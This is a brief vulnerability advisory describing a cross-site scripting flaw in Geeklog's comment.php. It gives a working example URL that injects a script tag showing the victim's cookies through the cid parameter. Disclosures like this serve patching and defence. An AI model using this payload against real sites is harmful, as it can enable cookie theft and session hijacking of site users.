Geeklog Comment.PHP Cross-Site Scripting Vulnerability

Geeklog Comment.PHP Cross-Site Scripting Vulnerability

There is no exploit required. The following example was submitted:

http://www.example.com//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>